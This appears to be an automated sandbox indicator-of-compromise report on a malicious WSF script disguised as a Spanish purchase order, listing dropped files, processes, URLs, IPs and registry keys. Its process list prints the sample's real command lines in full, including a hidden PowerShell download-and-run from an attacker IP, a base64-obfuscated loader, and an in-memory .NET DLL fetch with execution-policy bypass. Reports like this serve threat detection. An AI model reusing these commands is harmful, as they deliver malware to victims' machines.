IOC Report
NUEVA ORDEN DE COMPRA 80107.wsf

loading gif

Files

File Path
Type
Category
Malicious
NUEVA ORDEN DE COMPRA 80107.wsf
UTF-8 Unicode text, with very long lines, with CRLF line terminators
initial sample
malicious
C:\ProgramData\Done.vbs
Non-ISO extended-ASCII text, with CRLF line terminators
dropped
malicious
C:\Windows\Temp\Done.vbs
Little-endian UTF-16 Unicode text, with very long lines, with CRLF, CR line terminators
dropped
malicious
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
data
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0i4inhxi.qyz.ps1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2fuzbet0.1gd.ps1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5pqmaeda.zwf.psm1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ci2jssrm.icg.ps1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_e5kpxlgc.rz4.psm1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_egrwuhbw.ty3.psm1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gmtexydj.af0.ps1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_q0pwlqea.rls.psm1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qbmitrze.fya.psm1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qct2mbdi.gzd.psm1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yi3ekm1h.hmy.ps1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yqfb03wu.q5o.ps1
very short file (no magic)
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\203a5f290b65cc8e.customDestinations-ms (copy)
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\GKHBRLNPJU0ODJT48OSA.temp
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\notepad.lnk
MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Wed Apr 11 22:35:26 2018, mtime=Sat May 28 03:15:50 2022, atime=Wed Apr 11 22:35:26 2018, length=447488, window=hidenormalshowminimized
dropped
C:\Users\user\Documents\20220527\PowerShell_transcript.936905.5h_PkwvK.20220527211608.txt
UTF-8 Unicode (with BOM) text, with CRLF line terminators
dropped
C:\Users\user\Documents\20220527\PowerShell_transcript.936905.E1mPwf08.20220527211605.txt
UTF-8 Unicode (with BOM) text, with CRLF line terminators
dropped
C:\Users\user\Documents\20220527\PowerShell_transcript.936905.g8PVW+ZW.20220527211543.txt
UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators
dropped
C:\Users\user\Documents\20220527\PowerShell_transcript.936905.nOp+0WJ9.20220527211551.txt
UTF-8 Unicode (with BOM) text, with CRLF line terminators
dropped
C:\Users\user\Documents\20220527\PowerShell_transcript.936905.niV_xjXk.20220527211529.txt
UTF-8 Unicode (with BOM) text, with CRLF line terminators
dropped
C:\Users\user\Documents\20220527\PowerShell_transcript.936905.zvvmzKz8.20220527211546.txt
UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators
dropped
There are 15 hidden files, click here to show them.

Processes

Path
Cmdline
Malicious
C:\Windows\System32\wscript.exe
C:\Windows\System32\wscript.exe "C:\Users\user\Desktop\NUEVA ORDEN DE COMPRA 80107.wsf"
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden wget 'http://2.56.57.22/daveCrpted.jpg' -o C:\Windows\Temp\Done.vbs;explorer.exe C:\Windows\Temp\Done.vbs;Start-Sleep 1;rm *.vbs,*.wsf
malicious
C:\Windows\explorer.exe
"C:\Windows\explorer.exe" C:\Windows\Temp\Done.vbs
malicious
C:\Windows\explorer.exe
C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
malicious
C:\Windows\System32\wscript.exe
"C:\Windows\System32\WScript.exe" "C:\Windows\Temp\Done.vbs"
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $iUqm = 'WwBCAHkAdABlAFsAXQBdACAAJABEAEwATAAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAG???ANgA0AFMAdAByAGkAbgBnACgAKABOAG???AdwAtAE8AYgBqAG???AYwB0ACAATgBlAHQALgBXAG???AYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvADIAMAAuADEAMAA2AC4AMgAzADIALgA0AC8AZABsAGwALwAyADYALQAwAD???ALQAyADAAMgAyAC0A???wB0AGEAcgB0AF???AcAAuAHAAZABmACcAKQApADsAWwBTAHkAcwB0AG???AbQAuAEEAcABwAEQAbwBtAGEAaQBuAF0AOgA6AEMAdQByAHIAZQBuAHQARABvAG0AYQBpAG4ALgBMAG8AYQBkACgAJABEAEwATAApAC4ARwBlAHQAVAB5AHAAZQAoACcAZABkAHMAYwBmAEkAdgBxAGcAVwAuAEgAbwBOAFkAbABEAFIATwBMAFAAJwApAC4ARwBlAHQATQBlAHQAaABvAGQAKAAnAFIAdQBuACcAKQAuAEkAbgB2AG8AawBlACgAJABuAH???AbABsACwAIABbAG8AYgBqAG???AYwB0AFsAXQBdACAAKAAnAHQAeAB0AC4AawBqAGkAaAB1AGcAZgBkAHMAdAAvADIAMgAuADcANQAuADYANQAuADIALwAvADoAcAB0AHQAaAAnACkAKQA=';$OWjuxD = [System.Text.Encoding]::Unicode.GetString( [System.Convert]::FromBase64String( $iUqm.replace('???','U') ) );powershell.exe -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command $OWjuxD
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command "[Byte[]] $DLL = [System.Convert]::FromBase64String((New-Object Net.WebClient).DownloadString('http://20.106.232.4/dll/26-05-2022-StartUp.pdf'));[System.AppDomain]::CurrentDomain.Load($DLL).GetType('ddscfIvqgW.HoNYlDROLP').GetMethod('Run').Invoke($null, [object[]] ('txt.kjihugfdst/22.75.65.2//:ptth'))
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe" -WindowStyle Hidden Copy-Item -Path *.vbs -Destination C:\ProgramData\Done.vbs
malicious
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
malicious
C:\Windows\explorer.exe
C:\Windows\Explorer.EXE
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -WindowStyle Hidden Start-Sleep 5;Start-Process C:\ProgramData\Done.vbs
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden Start-Sleep 5
malicious
C:\Windows\System32\wscript.exe
"C:\Windows\System32\WScript.exe" "C:\ProgramData\Done.vbs"
malicious
C:\Windows\SysWOW64\WWAHost.exe
C:\Windows\SysWOW64\WWAHost.exe
malicious
C:\Windows\explorer.exe
"C:\Windows\explorer.exe" /LOADSAVEDWINDOWS
malicious
C:\Windows\explorer.exe
explorer.exe
malicious
C:\Windows\explorer.exe
"C:\Windows\explorer.exe" /LOADSAVEDWINDOWS
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\cmd.exe
/c del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
There are 13 hidden processes, click here to show them.

URLs

Name
IP
Malicious
http://www.giaohanggiaretetkiemhcm.com
unknown
malicious
http://www.acesso-livre-mercado.com/s4ig/www.40dgj.xyz
unknown
malicious
http://www.bikebrewandflights.comReferer:
unknown
malicious
http://www.acesso-livre-mercado.com/s4ig/
unknown
malicious
http://www.fairble.com/s4ig/www.shref94.com
unknown
malicious
http://www.shref94.com/s4ig/www.deadsdradqueer.com
unknown
malicious
http://www.mentication.comReferer:
unknown
malicious
http://2.56.57.22/daveCrpted.jpg0y
unknown
malicious
http://www.nexusbalance.com
unknown
malicious
http://www.hibikaiteki.com
unknown
malicious
http://www.fairble.comReferer:
unknown
malicious
http://www.mgav21.xyz/s4ig/?0tx=dCXC+2ZT0QRaPMB/1bkCzyFCQOsWt/uhEcdMypxrEdi7eXd+jvTokAesL3IOP6QRIKOYlLryUQ==&CTM8q=6lUH4xyXELQ8-0r
45.128.51.66
malicious
http://www.giaohanggiaretetkiemhcm.comReferer:
unknown
malicious
http://www.mentication.com/s4ig/www.prostitutkitambovasuck.info
unknown
malicious
http://2.56.57.22/daveCrpt
unknown
malicious
http://www.fairble.com/s4ig/
unknown
malicious
http://www.40dgj.xyz
unknown
malicious
http://www.nexusbalance.com/s4ig/
unknown
malicious
http://www.createurs-de-bijoux.com
unknown
malicious
http://pesterbdd.com/images/Pester.png
unknown
malicious
http://www.deadsdradqueer.com/s4ig/www.acesso-livre-mercado.com
unknown
malicious
https://go.micro
unknown
malicious
http://www.caui.topReferer:
unknown
malicious
https://contoso.com/Icon
unknown
malicious
http://www.shref94.com/s4ig/
unknown
malicious
http://20.106.232.48
unknown
malicious
http://www.nexusbalance.com/s4ig/?CTM8q=6lUH4xyXELQ8-0r&0tx=cD7SGqgsMdn1qG9AyDMlGxGbikkTJ3e+SLNAYG8XHeGes8xhGajuA9PSV6Vq4uulpQsNka3DRA==
91.195.240.103
malicious
http://www.sushifactoryamphawa.com/s4ig/
unknown
malicious
https://www.sushifactoryamphawa.com/s4ig/?CTM8q=6lUH4xyXELQ8-0r&0tx=OUASG
unknown
malicious
https://www.sushifactoryamphawa.com/s4ig/?CTM8q=6lUH4xyXELQ8-0r&0tx=OUASG
unknown
malicious
http://www.sushifactoryamphawa.comReferer:
unknown
malicious
http://www.choicearticleto-readtoday.infoReferer:
unknown
malicious
http://2.56.57.22
unknown
malicious
http://www.mgav21.xyzReferer:
unknown
malicious
http://www.mgav21.xyz/s4ig/www.createurs-de-bijoux.com
unknown
malicious
http://www.prostitutkitambovasuck.info/s4ig/TL
unknown
malicious
http://2.5
unknown
malicious
http://www.deadsdradqueer.com/s4ig/
unknown
malicious
http://www.sushifactoryamphawa.com
unknown
malicious
http://www.fairble.com
unknown
malicious
http://www.caui.top/s4ig/www.giaohanggiaretetkiemhcm.com
unknown
malicious
http://www.mgav21.xyz/s4ig/
unknown
malicious
http://2.56.57.22x
unknown
malicious
http://www.40dgj.xyz/s4ig/www.bikebrewandflights.com
unknown
malicious
http://www.choicearticleto-readtoday.info
unknown
malicious
http://www.deadsdradqueer.comReferer:
unknown
malicious
http://www.choicearticleto-readtoday.info/s4ig/
unknown
malicious
http://www.createurs-de-bijoux.com/s4ig/
unknown
malicious
http://www.acesso-livre-mercado.com
unknown
malicious
http://www.prostitutkitambovasuck.info/s4ig/
unknown
malicious
http://www.nexusbalance.com/s4ig/www.choicearticleto-readtoday.info
unknown
malicious
https://contoso.com/License
unknown
malicious
http://www.40dgj.xyzReferer:
unknown
malicious
www.hibikaiteki.com/s4ig/
malicious
http://www.deadsdradqueer.com
unknown
malicious
http://www.bikebrewandflights.com/s4ig/www.hibikaiteki.com
unknown
malicious
http://2.56.57.22/tsdfguhijk.txt
2.56.57.22
malicious
http://www.caui.top
unknown
malicious
http://www.bikebrewandflights.com/s4ig/
unknown
malicious
http://www.createurs-de-bijoux.comReferer:
unknown
malicious
http://www.nexusbalance.comReferer:
unknown
malicious
http://20.106.232.4/rumpe/26-05-2022-StartUp.pdf
20.106.232.4
malicious
https://contoso.com/
unknown
malicious
http://www.shref94.comReferer:
unknown
malicious
http://2.56.57.22/daveCrpted.jpg
2.56.57.22
malicious
http://www.acesso-livre-mercado.comReferer:
unknown
malicious
http://www.caui.top/s4ig/
unknown
malicious
http://www.hibikaiteki.com/s4ig/
unknown
malicious
http://www.hibikaiteki.com/s4ig/www.caui.top
unknown
malicious
https://www.mgydez.site/s4ig/?0tx=dCXC
unknown
malicious
http://www.createurs-de-bijoux.com/s4ig/www.fairble.com
unknown
malicious
http://www.choicearticleto-readtoday.info/s4ig/www.sushifactoryamphawa.com
unknown
malicious
http://20.6.
unknown
malicious
http://www.giaohanggiaretetkiemhcm.com/s4ig/www.mentication.com
unknown
malicious
http://www.mentication.com/s4ig/
unknown
malicious
http://www.sushifactoryamphawa.com/s4ig/?CTM8q=6lUH4xyXELQ8-0r&0tx=OUASG+zKIyPgsbPq7aByYUb53Y7vFTrhhhVYwgCqKyQGNMMvVk3uDgUSApaDProA7A9idTtJxA==
199.34.228.47
malicious
http://20.106.232.4/dll/26-05-2022-StartUp.pdf
20.106.232.4
malicious
http://www.sushifactoryamphawa.com/s4ig/www.mgav21.xyz
unknown
malicious
http://www.giaohanggiaretetkiemhcm.com/s4ig/
unknown
malicious
http://20.106.232.4
unknown
malicious
http://www.mgav21.xyz
unknown
malicious
http://www.hibikaiteki.comReferer:
unknown
malicious
http://www.mentication.com
unknown
malicious
http://www.prostitutkitambovasuck.info
unknown
malicious
http://www.prostitutkitambovasuck.infoReferer:
unknown
malicious
http://www.shref94.com
unknown
malicious
http://www.40dgj.xyz/s4ig/
unknown
malicious
http://2.56.57.22/daveCrpted
unknown
malicious
http://www.choicearticleto-readtoday.info/s4ig/?0tx=EE1KxreShStuWGRfOzXQivmJYb01nsHN4Y+USZVKUNF8o5M6FFhEbiUBXOrRFrwbnBV3ymr95w==&CTM8q=6lUH4xyXELQ8-0r
54.203.72.218
malicious
http://www.bikebrewandflights.com
unknown
malicious
http://2.56.57.22/ts
unknown
malicious
https://nuget.org/nuget.exe
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
http://www.apache.org/licenses/LICENSE-2.0.html
unknown
https://github.com/Pester/Pester
unknown
http://img.sedoparking.com
unknown
http://nuget.org/NuGet.exe
unknown
https://www.sedo.com/services/parking.php3
unknown
There are 88 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
www.salazarcomunicacion.com
103.167.196.150
www.sushifactoryamphawa.com
199.34.228.47
www.mgav21.xyz
45.128.51.66
a-0019.standard.a-msedge.net
204.79.197.222
www.nexusbalance.com
91.195.240.103
part-0032.t-0009.fbs1-t-msedge.net
13.107.219.60
a-9999.a-msedge.net
204.79.197.254
www.choicearticleto-readtoday.info
54.203.72.218
site-cdn.onenote.net
unknown
www.createurs-de-bijoux.com
unknown

IPs

IP
Domain
Country
Malicious
2.56.57.22
unknown
Netherlands
malicious
20.106.232.4
unknown
United States
malicious
199.34.228.47
www.sushifactoryamphawa.com
United States
54.203.72.218
www.choicearticleto-readtoday.info
United States
45.128.51.66
www.mgav21.xyz
Netherlands
91.195.240.103
www.nexusbalance.com
Germany

Registry

Path
Value
Malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileDirectory
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.vbs\OpenWithProgids
VBSFile
HKEY_CURRENT_USER_Classes\Local Settings\MuiCache\f0\52C64B7E
@C:\Windows\System32\wshext.dll,-4511
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
LangID
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
C:\Windows\System32\WScript.exe.FriendlyAppName
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
C:\Windows\System32\WScript.exe.ApplicationCompany
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer
SlowContextMenuEntries
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\CD Burning\StagingInfo\Volume{e6e9dfd8-98f2-11e9-90ce-806e6f6e6963}
DriveNumber
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.zip\OpenWithProgids
Unpacker
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{ef47ea26-ec76-4a6e-8680-9e53b539546d}
Generation
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{4b110390-e32a-400c-bf41-7fe93773464a}
Generation
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{b8455d9b-4916-480e-8b44-905b33ca001e}
Generation
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{e6e9dfd8-98f2-11e9-90ce-806e6f6e6963}
Generation
HKEY_CURRENT_USER\Software\Microsoft\Windows\Shell\Bags\1\Desktop
IconLayouts
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionInfo\1\ApplicationViewManagement\W32:0000000000010398
VirtualDesktop
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionInfo\1\ApplicationViewManagement\W32:000000000001039A
VirtualDesktop
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionInfo\1\ApplicationViewManagement\W32:0000000000010370
VirtualDesktop
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionInfo\1\ApplicationViewManagement\W32:0000000000010358
VirtualDesktop
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionInfo\1\ApplicationViewManagement\W32:0000000000010372
VirtualDesktop
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionInfo\1\ApplicationViewManagement\W32:0000000000010366
VirtualDesktop
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionInfo\1\ApplicationViewManagement\W32:000000000001035C
VirtualDesktop
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionInfo\1\ApplicationViewManagement\W32:000000000001036C
VirtualDesktop
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionInfo\1\ApplicationViewManagement\W32:000000000001035E
VirtualDesktop
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionInfo\1\ApplicationViewManagement\W32:000000000001035A
VirtualDesktop
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionInfo\1\ApplicationViewManagement\W32:0000000000010350
VirtualDesktop
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionInfo\1\ApplicationViewManagement\W32:0000000000010348
VirtualDesktop
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionInfo\1\ApplicationViewManagement\W32:000000000001033C
VirtualDesktop
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionInfo\1\ApplicationViewManagement\W32:0000000000010334
VirtualDesktop
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionInfo\1\ApplicationViewManagement\W32:000000000009008C
VirtualDesktop
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionInfo\1\ApplicationViewManagement\W32:000000000001031A
VirtualDesktop
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionInfo\1\ApplicationViewManagement\W32:000000000001031C
VirtualDesktop
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionInfo\1\ApplicationViewManagement\W32:0000000000010318
VirtualDesktop
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionInfo\1\ApplicationViewManagement\W32:000000000001030E
VirtualDesktop
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Search
InstalledWin32AppsRevision
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer
SlowContextMenuEntries
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\CloudStore\Store\Cache\DefaultAccount\$de${f480d6a3-f628-46ea-a437-d0b05400c5c5}$$windows.data.unifiedtile.localstartvolatiletilepropertiesmap\Current
Data
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer
SlowContextMenuEntries
HKEY_CURRENT_USER\Software\Microsoft\Windows\Shell\Bags\1\Desktop
IconLayouts
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\CloudStore\Store\Cache\DefaultAccount\$$windows.data.signals.registrations\Current
Data
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Search
InstalledWin32AppsRevision
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Security and Maintenance\Checks\{E8433B72-5842-4d43-8645-BC2C35960837}.check.101
CheckSetting
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Security and Maintenance\Checks\{E8433B72-5842-4d43-8645-BC2C35960837}.check.100
CheckSetting
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Security and Maintenance\Checks\{852FB1F8-5CC6-4567-9C0E-7C330F8807C2}.check.100
CheckSetting
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Security and Maintenance\Checks\{852FB1F8-5CC6-4567-9C0E-7C330F8807C2}.check.101
CheckSetting
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.3g2\OpenWithProgids
WMP11.AssocFile.3G2
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.3gp\OpenWithProgids
WMP11.AssocFile.3GP
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.3gp2\OpenWithProgids
WMP11.AssocFile.3G2
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.3gpp\OpenWithProgids
WMP11.AssocFile.3GP
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.aac\OpenWithProgids
WMP11.AssocFile.ADTS
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\TrayNotify
IconStreams
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.adt\OpenWithProgids
WMP11.AssocFile.ADTS
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.adts\OpenWithProgids
WMP11.AssocFile.ADTS
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.aif\OpenWithProgids
WMP11.AssocFile.AIFF
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.aifc\OpenWithProgids
WMP11.AssocFile.AIFF
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.aiff\OpenWithProgids
WMP11.AssocFile.AIFF
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.asf\OpenWithProgids
WMP11.AssocFile.ASF
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.asx\OpenWithProgids
WMP11.AssocFile.ASX
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.au\OpenWithProgids
WMP11.AssocFile.AU
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.au3\OpenWithProgids
AutoIt3Script
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.avi\OpenWithProgids
WMP11.AssocFile.AVI
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.bmp\OpenWithProgids
Paint.Picture
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.cab\OpenWithProgids
CABFolder
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.cdxml\OpenWithProgids
Microsoft.PowerShellCmdletDefinitionXML.1
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.contact\OpenWithProgids
contact_wab_auto_file
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.css\OpenWithProgids
CSSfile
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.csv\OpenWithProgids
Excel.CSV
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.dds\OpenWithProgids
ddsfile
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.dib\OpenWithProgids
Paint.Picture
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.dll\OpenWithProgids
dllfile
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.doc\OpenWithProgids
Word.Document.8
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.docm\OpenWithProgids
Word.DocumentMacroEnabled.12
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.docx\OpenWithProgids
Word.Document.12
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.dot\OpenWithProgids
Word.Template.8
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.dotm\OpenWithProgids
Word.TemplateMacroEnabled.12
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.dotx\OpenWithProgids
Word.Template.12
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.emf\OpenWithProgids
emffile
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.exe\OpenWithProgids
exefile
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.flac\OpenWithProgids
WMP11.AssocFile.FLAC
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.fon\OpenWithProgids
fonfile
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.gif\OpenWithProgids
giffile
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.htm\OpenWithProgids
htmlfile
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.html\OpenWithProgids
htmlfile
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.ico\OpenWithProgids
icofile
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.ini\OpenWithProgids
inifile
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.jfif\OpenWithProgids
pjpegfile
